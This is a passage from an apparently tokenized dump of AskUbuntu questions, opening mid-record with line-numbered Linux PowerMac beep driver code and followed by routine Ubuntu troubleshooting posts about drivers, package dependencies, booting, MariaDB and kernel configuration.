1000 ; 116 case snd_tone : break ; 117 default : return -1 ; 118 } 119 120 chip = input_get_drvdata ( dev ) ; 121 if ( ! chip || ( beep = chip- > beep ) == null ) 122 return -1 ; 123 124 if ( ! hz ) { 125 spin_lock_irqsave ( & chip- > reg_lock , flags ) ; 126 if ( beep- > running ) 127 snd_pmac_beep_stop ( chip ) ; 128 spin_unlock_irqrestore ( & chip- > reg_lock , flags ) ; 129 return 0 ; 130 } 131 132 beep_speed = snd_pmac_rate_index ( chip , & chip- > playback , beep_srate ) ; 133 srate = chip- > freq_table [ beep_speed ] ; 134 135 if ( hz < = srate / beep_buflen || hz > srate / 2 ) 136 hz = 1000 ; 137 138 spin_lock_irqsave ( & chip- > reg_lock , flags ) ; 139 if ( chip- > playback.running || chip- > capture.running || beep- > running ) { 140 spin_unlock_irqrestore ( & chip- > reg_lock , flags ) ; 141 return 0 ; 142 } 143 beep- > running = 1 ; 144 spin_unlock_irqrestore ( & chip- > reg_lock , flags ) ; 145 146 if ( hz == beep- > hz & & beep- > volume == beep- > volume_play ) { 147 nsamples = beep- > nsamples ; 148 } else { 149 period = srate * 256 / hz ; /* fixed point */ 150 ncycles = beep_buflen * 256 / period ; 151 nsamples = ( period * ncycles ) > > 8 ; 152 f = ncycles * 65536 / nsamples ; 153 j = 0 ; 154 p = beep- > buf ; 155 for ( i = 0 ; i < nsamples ; ++i , p += 2 ) { 156 p [ 0 ] = p [ 1 ] = beep_wform [ j > > 8 ] * beep- > volume ; 157 j = ( j + f ) & 0xffff ; 158 } 159 beep- > hz = hz ; 160 beep- > volume_play = beep- > volume ; 161 beep- > nsamples = nsamples ; 162 } 163 164 spin_lock_irqsave ( & chip- > reg_lock , flags ) ; 165 snd_pmac_beep_dma_start ( chip , beep- > nsamples * 4 , beep- > addr , beep_speed ) ; 166 spin_unlock_irqrestore ( & chip- > reg_lock , flags ) ; 167 return 0 ; 168 } 169 170 /* 171 * beep volume mixer 172 */ 173 174 static int snd_pmac_info_beep ( struct snd_kcontrol *kcontrol , 175 struct snd_ctl_elem_info *uinfo ) 176 { 177 uinfo- > type = sndrv_ctl_elem_type_integer ; 178 uinfo- > count = 1 ; 179 uinfo- > value.integer.min = 0 ; 180 uinfo- > value.integer.max = 100 ; 181 return 0 ; 182 } 183 184 static int snd_pmac_get_beep ( struct snd_kcontrol *kcontrol , 185 struct snd_ctl_elem_value *ucontrol ) 186 { 187 struct snd_pmac *chip = snd_kcontrol_chip ( kcontrol ) ; 188 if ( snd_bug_on ( ! chip- > beep ) ) 189 return -enxio ; 190 ucontrol- > value.integer.value [ 0 ] = chip- > beep- > volume ; 191 return 0 ; 192 } 193 194 static int snd_pmac_put_beep ( struct snd_kcontrol *kcontrol , 195 struct snd_ctl_elem_value *ucontrol ) 196 { 197 struct snd_pmac *chip = snd_kcontrol_chip ( kcontrol ) ; 198 unsigned int oval , nval ; 199 if ( snd_bug_on ( ! chip- > beep ) ) 200 return -enxio ; 201 oval = chip- > beep- > volume ; 202 nval = ucontrol- > value.integer.value [ 0 ] ; 203 if ( nval > 100 ) 204 return -einval ; 205 chip- > beep- > volume = nval ; 206 return oval ! = chip- > beep- > volume ; 207 } 208 209 static struct snd_kcontrol_new snd_pmac_beep_mixer = { 210 .iface = sndrv_ctl_elem_iface_mixer , 211 .name = `` beep playback volume '' , 212 .info = snd_pmac_info_beep , 213 .get = snd_pmac_get_beep , 214 .put = snd_pmac_put_beep , 215 } ; 216 217 /* initialize beep stuff */ 218 int __devinit snd_pmac_attach_beep ( struct snd_pmac *chip ) 219 { 220 struct pmac_beep *beep ; 221 struct input_dev *input_dev ; 222 struct snd_kcontrol *beep_ctl ; 223 void *dmabuf ; 224 int err = -enomem ; 225 226 beep = kzalloc ( sizeof ( *beep ) , gfp_kernel ) ; 227 if ( ! beep ) 228 return -enomem ; 229 dmabuf = dma_alloc_coherent ( & chip- > pdev- > dev , beep_buflen * 4 , 230 & beep- > addr , gfp_kernel ) ; 231 input_dev = input_allocate_device ( ) ; 232 if ( ! dmabuf || ! input_dev ) 233 goto fail1 ; 234 235 /* fixme : set more better values */ 236 input_dev- > name = `` powermac beep '' ; 237 input_dev- > phys = `` powermac/beep '' ; 238 input_dev- > id.bustype = bus_adb ; 239 input_dev- > id.vendor = 0x001f ; 240 input_dev- > id.product = 0x0001 ; 241 input_dev- > id.version = 0x0100 ; 242 243 input_dev- > evbit [ 0 ] = bit_mask ( ev_snd ) ; 244 input_dev- > sndbit [ 0 ] = bit_mask ( snd_bell ) | bit_mask ( snd_tone ) ; 245 input_dev- > event = snd_pmac_beep_event ; 246 input_dev- > dev.parent = & chip- > pdev- > dev ; 247 input_set_drvdata ( input_dev , chip ) ; 248 249 beep- > dev = input_dev ; 250 beep- > buf = dmabuf ; 251 beep- > volume = beep_volume ; 252 beep- > running = 0 ; 253 254 beep_ctl = snd_ctl_new1 ( & snd_pmac_beep_mixer , chip ) ; 255 err = snd_ctl_add ( chip- > card , beep_ctl ) ; 256 if ( err < 0 ) 257 goto fail1 ; 258 259 chip- > beep = beep ; 260 261 err = input_register_device ( beep- > dev ) ; 262 if ( err ) 263 goto fail2 ; 264 265 return 0 ; 266 267 fail2 : snd_ctl_remove ( chip- > card , beep_ctl ) ; 268 fail1 : input_free_device ( input_dev ) ; 269 if ( dmabuf ) 270 dma_free_coherent ( & chip- > pdev- > dev , beep_buflen * 4 , 271 dmabuf , beep- > addr ) ; 272 kfree ( beep ) ; 273 return err ; 274 } 275 276 void snd_pmac_detach_beep ( struct snd_pmac *chip ) 277 { 278 if ( chip- > beep ) { 279 input_unregister_device ( chip- > beep- > dev ) ; 280 dma_free_coherent ( & chip- > pdev- > dev , beep_buflen * 4 , 281 chip- > beep- > buf , chip- > beep- > addr ) ; 282 kfree ( chip- > beep ) ; 283 chip- > beep = null ; 284 } 285 } 286
509041	ubuntu 14.04 modded png tray icon by photoshop not work ?	i tried to mod some images from tray icon folder ( in /usr/share/icons/hicolor/22x22/apps ) to fit with my theme . i made new png with same size ( 22x22 ) by photoshop to replace . but it seem not to work after i copied , those new files change to error icons after that , but i still can open them by imageview as well . but some modded images of same files i want modded , what i downloaded from internet , worked great ! sometimes ubuntu difficult to understand . any help ? thanks !
509048	how to activate script on laptop from smartphone ?	i want to run a linux script on my laptop remotely from my smartphone ( iphone , namely ) . for simplicity let 's say the script is called myscript.sh and it is located in /root/desktop . i am running as root user ( yeah , i know what i am doing running as root . ) from the information i have gather these are the possible solutions : 1 . write some sort of app for iphone to communicate ( sounds painstaking and too complex for me . ) 2 . sending emails and using the `` procmail '' thing 3 . sending emails and using the `` postfix '' thing all of the methods mentioned above are pretty unknown to me ; i have n't heard of them until recently . so can anybody please enlighten me on any method that allow me to run a linux of my laptop from my smartphone . thank you ! edit : by the way , i have no servers running at home .
509051	ubsl command line interface	i had installed ubsl setup for dsp controller . it has been been installed into /usr/local/bin . but when i try to invoke the ubsl command-line interface by typing ubsl in a window at the shell command prompt , it says that ubsl : no such file or directory . so how can i invoke ubsl command line interface ?
509053	gtk-launch desktop file with arguments	i have a .desktop file with following exec-line exec = python script.py % u however , when i do gtk-launch test.desktop /home/user the argument /home/user is not passed to script.py why ? or is there another way to run a .desktop file from command line that does allow to pass parameters ? btw : i 'm running 14.04 if it matters
509054	reboot loop after upgrading to 14.04	after getting the no more support message i upgraded from 13.10 to 14.04 it seemed to go fine but after about a minute the computer rebooted then there after it would reboot every 30 sec.-2 minutes . finally wiped hard drive and reinstalled 13.10 . i ordered a 14.04.1 lts live cd . it does the same thing , as soon as it gets to the try/install screen it reboots tried 64 and 32 bit version , both the same . has anyone had this issue or could give me advice ? msi a88xm-e45 motherboard , a6 processor , 8g memory , 64g ssd sata hd , 1t 7200rpm sata hd
509058	lockdir.exe open in linux	i have locked my files using lockdir.exe in my external hard drive when i had windows 8 in my lap top . i know the password . but now i am using linux 14.04 and now i need to get those file but i can not open it using linux . can anyone help me find a way to open the lockdir.exe program ? ?
509061	ubuntu 14.04 amd/intel hybrid switchable graphics not working	i 'm using ubuntu 14.04 on the hp 4530s with amd radeon hd 6490m/intel hd graphics 3000 switchable graphics . i have installed the first intel driver from here . then i reboot so far there are no problems then i install the ati driver `` amd-catalyst-14-4-rev2-linux-x86-x86-64-may6.zip '' and reboot . the system is opening low graphic mode . i also tried switch integrated intel graphics card everything works fine . any ideas what to do to fix this problem ?
509062	mariadb-server depends on mariadb-server-5.5 ( = 5.5.39+maria-1~wheezy ) ; however : package mariadb-server-5.5 is not configured yet	not sure if the ubuntu forum is the right place but i could n't see one specific to debian . i am running a debian chroot environment with debian gnu/linux 7.6 ( wheezy ) . i attempted to install mariadb by following the instructions here : https : //downloads.mariadb.org/mariadb/repositories/ # mirror=somerset & distro=debian & distro_release=wheezy & version=5.5 repository : deb http : //mirror.stshosting.co.uk/mariadb/repo/5.5/debian wheezy main this was a fresh install without either maria-db or mysql installed . root @ ds1513 : ~ # apt-get install mariadb-server reading package lists ... done building dependency tree reading state information ... done mariadb-server is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up mariadb-server-5.5 ( 5.5.39+maria-1~wheezy ) ... [ ok ] stopping mariadb database server : mysqld . [ fail ] starting mariadb database server : mysqld . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . failed ! invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mariadb-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mariadb-server : mariadb-server depends on mariadb-server-5.5 ( = 5.5.39+maria-1~wheezy ) ; however : package mariadb-server-5.5 is not configured yet . dpkg : error processing mariadb-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mariadb-server-5.5 mariadb-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i followed the instructions here to create a mariadb.pref file https : //blog.mariadb.org/dotdeb-repository-problems-with-mariadb-5-5-solution/ cat /etc/apt/preferences.d/mariadb.pref package : * pin : origin mirror.stshosting.co.uk pin-priority : 1000 but i get the same error . i have tried to remove the package but i just constantly get this circular dependency whatever i do . any ideas on how i can either proceed or uninstall mariadb cleanly would be appreciated checking /vars/syslog i do have a some errors . i just do n't know how to proceed . aug 10 10:43:10 ds1513 mysqld_safe : starting mysqld daemon with databases from /var/lib/mysql aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : the innodb memory heap is disabled aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : mutexes and rw_locks use gcc atomic builtins aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : compressed tables use zlib 1.2.8 aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : using linux native aio aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : initializing buffer pool , size = 128.0m aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : completed initialization of buffer pool aug 10 10:43:10 ds1513 mysqld : innodb : the first specified data file ./ibdata1 did not exist : aug 10 10:43:10 ds1513 mysqld : innodb : a new database to be created ! aug 10 10:43:10 ds1513 mysqld : 140810 10:43:10 innodb : setting file ./ibdata1 size to 10 mb aug 10 10:43:10 ds1513 mysqld : innodb : database physically writes the file full : wait ... aug 10 10:43:11 ds1513 mysqld : 140810 10:43:11 innodb : log file ./ib_logfile0 did not exist : new to be created aug 10 10:43:11 ds1513 mysqld : innodb : setting log file ./ib_logfile0 size to 5 mb aug 10 10:43:11 ds1513 mysqld : innodb : database physically writes the file full : wait ... aug 10 10:43:11 ds1513 mysqld : 140810 10:43:11 innodb : log file ./ib_logfile1 did not exist : new to be created aug 10 10:43:11 ds1513 mysqld : innodb : setting log file ./ib_logfile1 size to 5 mb aug 10 10:43:11 ds1513 mysqld : innodb : database physically writes the file full : wait ... aug 10 10:43:11 ds1513 mysqld : innodb : doublewrite buffer not found : creating new aug 10 10:43:11 ds1513 mysqld : innodb : doublewrite buffer created aug 10 10:43:11 ds1513 mysqld : innodb : 127 rollback segment ( s ) active . aug 10 10:43:11 ds1513 mysqld : innodb : creating foreign key constraint system tables aug 10 10:43:11 ds1513 mysqld : innodb : foreign key constraint system tables created aug 10 10:43:11 ds1513 mysqld : 140810 10:43:11 innodb : waiting for the background threads to start aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 percona xtradb ( http : //www.percona.com ) 5.5.37-mariadb-35.0 started ; log sequence number 0 aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 [ note ] plugin 'feedback ' is disabled . aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 [ note ] server socket created on ip : '127.0.0.1 ' . aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 [ error ] ca n't start server : bind on tcp/ip port . got error : 98 : address already in use aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 [ error ] do you already have another mysqld server running on port : 3306 ? aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 [ error ] aborting aug 10 10:43:12 ds1513 mysqld : aug 10 10:43:12 ds1513 mysqld : 140810 10:43:12 innodb : starting shutdown ... aug 10 10:43:13 ds1513 mysqld : 140810 10:43:13 innodb : shutdown completed ; log sequence number 1597945 aug 10 10:43:13 ds1513 mysqld : 140810 10:43:13 [ note ] /usr/sbin/mysqld : shutdown complete aug 10 10:43:13 ds1513 mysqld : aug 10 10:43:13 ds1513 mysqld_safe : mysqld from pid file /var/run/mysqld/mysqld.pid ended aug 10 10:43:41 ds1513 /etc/init.d/mysql [ 26200 ] : 0 processes alive and '/usr/bin/mysqladmin -- defaults-file=/etc/mysql/debian.cnf ping ' resulted in aug 10 10:43:41 ds1513 /etc/init.d/mysql [ 26200 ] : # 007/usr/bin/mysqladmin : connect to server at 'localhost ' failed aug 10 10:43:41 ds1513 /etc/init.d/mysql [ 26200 ] : error : 'ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) ' aug 10 10:43:41 ds1513 /etc/init.d/mysql [ 26200 ] : check that mysqld is running and that the socket : '/var/run/mysqld/mysqld.sock ' exists ! aug 10 10:43:41 ds1513 /etc/init.d/mysql [ 26200 ] : checking port : 3306 netstat -lp | grep 3306 does n't find anything . also the file '/var/run/mysqld/mysqld.sock ' does not exist . i edited /etc/mysql/my.cnf and changed the port from 3306 to 4406 and the install proceeded . i 'm just at a loss to know why i had to change the port if the netsat produced no output .
509065	ubuntu crashing on purple loading screen	i 've done something which unfortunately seems to have caused ubuntu 14.04 to fail at start up and was wondering whether i could get some guidance about debugging the issue . it started when i rebooted after performing a few actions , namely : - installing brackets , steam and also haphazardly creating a start up script to apply some settings for mouse sensitivity configurations ( probably the cause : p ) . in the case that the latter did cause the issue , would somebody be able to guide me as to how to remove the start up script ? i 'm almost completely new and bearly have the basics grasped so if anyone could help me i 'd really appreciate it . edit : just to provide a bit more information about what i need , i 'm on the purple loading screen with the 5 loading circles , it 's displaying as if it 's finished loading , however it just hangs on that page . i 've tried pressing escape , f2 and ctrl + alt + f1 , but they do n't appear to do anything . it just seems that on that page it 's completely crashed . does anybody know of a way that from this point in the boot process i can access some form of error log or something that may provide me with some information regarding the nature of the problem ?
509066	14.04 - ca n't connect to internet macbook pro retina 2013	i just installed ubuntu 14.04 on a partition on my macbook pro ( 2013 ) and i ca n't figure out how to connect to the internet . i 've read everything i can find and nothing is working . i have it wired through ethernet via thunderbolt , which i do n't think ubuntu supports . when i click on the networking tab all it says is `` no network devices available '' and when i try to get drivers it says `` no additional drivers available . '' how do i connect to wifi and is there a way that i can use ethernet via thunderbolt ?
509067	unmet dependencies problem on 12.04 - libcurl4-openssl-dev depends librtmp-dev	i 'm having troubles with unmet dependencies on ubuntu 12.04 : libcurl4-openssl-dev depends librtmp-dev here is what i 've got after running sudo apt-get -f install which suggested running apt-get autoremove the output is identical if i run sudo apt-get install librtmp-dev reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libmagick++4 libgtkspell0 libgsl0ldbl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : librtmp-dev the following new packages will be installed : librtmp-dev 0 upgraded , 1 newly installed , 0 to remove and 82 not upgraded . 1 not fully installed or removed . need to get 0 b/67.1 kb of archives . after this operation , 201 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 322166 files and directories currently installed . ) unpacking librtmp-dev ( from ... /librtmp-dev_2.4~20110711.gitc28f1bab-1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/librtmp-dev_2.4~20110711.gitc28f1bab-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/librtmp/amf.h ' , which is also in package rtmpdump 2.5-0ubuntu2~precise no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librtmp-dev_2.4~20110711.gitc28f1bab-1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and here is the result of running sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libcurl4-openssl-dev : depends : librtmp-dev but it is not installed e : unmet dependencies . try using -f. this is the output after sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of libcurl4-openssl-dev : libcurl4-openssl-dev depends on librtmp-dev ; however : package librtmp-dev is not installed . dpkg : error processing libcurl4-openssl-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libcurl4-openssl-dev the output of sudo apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libcurl4-openssl-dev : depends : librtmp-dev but it is not installed e : unmet dependencies . try using -f. the repository source list : cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //bg.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //bg.archive.ubuntu.com/ubuntu/ precise restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //bg.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //bg.archive.ubuntu.com/ubuntu/ precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //bg.archive.ubuntu.com/ubuntu/ precise universe deb http : //bg.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //bg.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //bg.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //bg.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //bg.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security restricted main multiverse universe # added by software-properties deb http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //mirrors.dotsrc.org/getdeb/ubuntu precise-getdeb apps deb-src http : //mirrors.dotsrc.org/getdeb/ubuntu precise-getdeb apps deb http : //ppa.launchpad.net/musicbrainz-developers/stable/ubuntu precise main deb-src http : //ppa.launchpad.net/musicbrainz-developers/stable/ubuntu precise main deb http : //ppa.launchpad.net/nae-team/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/nae-team/ppa/ubuntu precise main deb http : //downloads.sourceforge.net/project/sonar-pkg/deb binary/ # deb-src http : //downloads.sourceforge.net/project/sonar-pkg/deb binary/ apt-get clean and apt-get autoclean does n't do anything to fix this . and here is the crash report : help , please ! ! !
509068	installing broken sword	hi i want to install broken sword i have it as a tar.gz file which i have extracted i am not sure what i do next can anyone help ?
509070	how to see the directories etc , bin , boot in the file system ?	i am new to ubuntu and i am unable to see the files in /etc , /bin and /boot . i want to know by using which command i can see them ? i have tried logging in as root sudo -s and tree command but unable to view them .
509071	iptables debugging on ubuntu 12.04	ufw was blocking the incoming ssh connection . so removed and purged the ufw still the incoming ssh connection is blocked . but there is not logs in dmesg output . i am sure sshd is running , tested using the ssh localhost and it works . how to disable the iptables completely
509072	i can not get a gui on ubuntu 14.04	i have gone through multiple guides on how to set up a gui for my ubuntu server 14.04 . however all have failed . i tried using other linux operating systems but they too have failed at attaining a gui . the following linux os 's have been tried : centos 7 , fedora , and ubuntu server 14.04 all of this was done on a ovh hosted vps server , i can not just install an os that comes with a gui as they do not provide such os 's . after following almost all guides i keep getting to a point where the final thing needed was for me to run this command : startx however upon entering that command i get this error :
509074	authentication failure while accessing super-user privilege	i get the root privilege when i type sudo . but when su asks for the password , which i type in , the terminal says su : authentication failure
509075	dell vostro 2520 3rd gen pdc factory set bootable pendrive creation	i have dell vostro 2520 intel 3rd gen pentium dual core laptop . i want to create a bootable pendrive along with my factory default driver files . in internet i can find the ubuntu os 12.04 , but not the factory made drivers for my laptop specifications . can i find this anywhere in my laptop itself ? please suggest .
509077	homebank layout broken	main screen layout in homebank 4.6.2 is broken et start up . if i adjust the layout , it does not retain and screen is messy when i launch the program . i trashed homebank preferences in /home/user/.config/homebank but it does n't help . how can i solve this ?
509079	ubuntu - red triangle update information is outdated	i get a red triangle at the top right corner saying update information is outdated . the below is the error when i run sudo apt-get update err http : //in.archive.ubuntu.com precise/universe i386 packages 404 not found [ ip : 91.189.91.13 80 ] get:31 http : //in.archive.ubuntu.com precise-updates/universe translation-en [ 183 kb ] 100 % [ 31 translation-en gzip 0 b ] [ waiting for headers ] 2,335 kb/s 0sw : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig d8ad4de78eebb0ca launchpad clipgrab ppa w : gpg error : http : //in.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > e : unable to parse package file /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en.decomp ( 1 ) get:32 http : //in.archive.ubuntu.com precise/universe translation-en [ 15.0 mb ] fetched 3,881 kb in 36s ( 107 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise_universe_source_sources hash sum mismatch w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages hash sum mismatch w : failed to fetch copy : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en e : some index files failed to download . they have been ignored , or old ones used instead .
509081	ubuntu 14.04x64 printing issues ( not happenning in the other versions )	i have a canon ir-adv c5030 printer , i always had troubles before with linux , but there is nothing to do with that . since a while canon develop the linux drivers for this printer and they work great with the past versions of ubuntu . now everytime that i try to print in version 14.04 i got the `` filter failed '' e [ 09/aug/2014:12:32:10 -0400 ] [ job 32 ] job stopped due to filter errors ; please consult the error_log file for details . this is the full debug for a print attempt .
509089	trying to install lubuntu 14.04 on dell dimension 2300	i tried to install on dell computer . this computer achieves an internet connection via windows xp , however does not with lubuntu . before i perform the full install , i 'd like to make sure it is connected to the internet . perhaps the full install will solve the problem ?
509090	problem with nvidia drivers ( how do i apply a patch ) ?	up until my most recent apt-get upgrade , i was using bumblebee to manage my nvidia graphics card , and it was working perfectly - using primusrun , i could get upwards of 700 fps with glxgears . now , however , when i try primusrun glxgears , i get this error : primus : fatal : bumblebee daemon reported : error : could not load gpu driver so i look in dmesg and see this : [ 33359.665924 ] nvidia : unknown symbol acpi_os_wait_events_complete ( err 0 ) by using dpkg , i see that i have these nvidia packages installed : bumblebee-nvidia nvidia-304 nvidia-304-updates nvidia-current nvidia-settings googling this lead me to this page , which suggests adding a patch to the driver and recompiling it if you have errors on kernel version 3.13 ( which i 'm on ) . where can i find the source code for the driver to recompile it ? i thought the nvidia drivers were closed source , but the people on that forum do n't seem to be nvidia devs . i 'm comfortable compiling packages and with make , but if anyone has advice compiling the driver it would be well appreciated . edit : i think i 'm having the same problem as this person .
509092	updated . triple-boot : windows 7/8 and ubuntu ( 7/8 already installed )	scroll down and read my update please i have windows 7 and 8.1 installed and i want to install ubuntu . my windows 7 is 32bit , windows 8.1 is 64bit ( my printer driver is not released on 64bit , but my job requires 64bit ) . i want to tripleboot 3os-es . my downloaded ubuntu is amd64 . installed ubuntu 14.04 wanted to disable grub ( windows recovery environment ( on/dev1/sda ) to boot windows 7/8 ; or ubuntu to boot to ubuntu ) i tried easybcd : i open easybcd clicked on 'add new entry' chose linux and chose grub and grub2 clicked on 'bcd deployment ' chose ... vista/7 ... and 'write mbr' rebooted grub was not showing ( gone to the windows boot recovery ) but ... ... .. there were showing only windows 7/8.1 how to make 3 booting scenes in the 'boot recovery update : made 3 booting scenes but when i choose ubuntu it goes into black screen and says failed to load kernel what to do ?
509095	geary installation	i wish to install geary mail client in xubuntu xfce 14.04 . i have tried both from ubuntu software repository and via terminal . geary seems to install ok but each time i log on i am asked for a password . i then get a login keyring pop up requiring another password which i do not have . the upshot is i ca n't use geary which i find it very frustrating to say the least . would any one kindly let me know the secret of getting geary to run without a password and getting shot of the keyring login requirement . thanks . tim , you ask if i have signed in to an online account . not so far as geary is concerned . have you any specific online accounts in mind ? i have online accounts for a number of programs of course .
509097	clear history of words typed in the dialog run ( alt + f2 ) ?	wanted to erase all the words that remain as an option , every time tightening alt + f2
509100	mac hard drive in ubuntu	how to mount a mac os extended ( journaled , encrypted ) hard drive in ubuntu ? i use this hd as time machine for my mac book backup , also i have some other files in it . but when i connected to my dell laptop both of ubuntu and w7 does not mount it : ( i also install hfs explorer , but it did not help !
509103	installing ubuntu os onto a self built computer that has no os on it	i want to build a computer and install ubuntu on it . how would i make a bootable usb drive with ubuntu on it ? the computer will have no os on it so how do i make the computer boot the usb and install ubuntu on it ?
509110	amd radeon hd 8790m drivers on ubuntu 12.04	i have been struggling with this for couple of days now and could really use some help . i recently got a dell latitude e6540 with ubuntu 12.04 . i am trying to install graphics drivers for the machine . this laptop has 2 video cards . here is the output of lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : advanced micro devices , inc , [ amd/ati ] mars xtx [ radeon hd 8790m ] after extensively researching online i found that this is the best guide to follow . following that link i tried 2 different ways to install the drivers . ( 1 ) using package manager i did : sudo apt-get install fglrx fglrx-amdcccle following that i regenerated the xorg.conf file by : sudo aticonfig -- initial -f ( 2 ) for the second method i manually fetched the latest catalyst driver for amd radeon hd 8xxx series with x86_64 linux . this was the version 14.100 of the driver and i installed it manually . same as the previous step i regenrated the xorg.conf file both of these methods simply lead to a purple screen during ubuntu boot up . i am able to boot up normally by going into recovery mode and deleting the xorg.conf file . however , doing this i can not use glx which is mainly what i need . i suspect that the presence of 2 video cards is screwing up this process . i am unable to find the customizations i need to make that will enable me to use the amd radeon graphics card . i would appreciate any help !
509114	ubuntu - cinnamonde no sound after uninstalling nemo	i tried to make nautilus my primary file manager , because i prefer it to nemo . i was unable to find any solutions that were effective . finally i found some advice focused on a similar issue ( thunar ) recommending apt-get purge . also , i followed the commands found on this page under the section entitled `` get back nautilus as default file manager with these commands : '' after doing this with nemo , i now seem to have a huge mess . firstly i noticed that i have no sound from any of my sound interfaces . also , on the unity side most of options in the settings menu are gone . all that remains is accessibility and a couple of others . i have since re-installed nemo hoping to reinstate the original settings , but the problem remains . any ideas on how to get out of this mess ?
509115	is there a reason the kernels from the kernel ppa do n't have various features turned on ?	i tried to use a kernel ppa version of 3.16 today to debug an issue i 've been having . everything was working well until i noticed that my usual aufs mounts were n't online . i combine a few directories because i do n't have enough space on one drive . long story sort , i found they had been removed from the kernel . overlayfs too . it left me scuppered . i 'm back on 3.13 now and i know full well how to recompile a kernel , i 'm just wondering if there 's a technical reason why both aufs and overlayfs have been explicitly turned off . you can actually see in the config patch where they 've been turned off : -config_aufs_bdev_loop=y - # config_aufs_branch_max_1023 is not set -config_aufs_branch_max_127=y - # config_aufs_branch_max_32767 is not set - # config_aufs_branch_max_511 is not set - # config_aufs_br_fuse is not set - # config_aufs_br_hfsplus is not set - # config_aufs_br_ramfs is not set - # config_aufs_debug is not set -config_aufs_export=y -config_aufs_fs=m - # config_aufs_hnotify is not set -config_aufs_ino_t_64=y - # config_aufs_rdu is not set 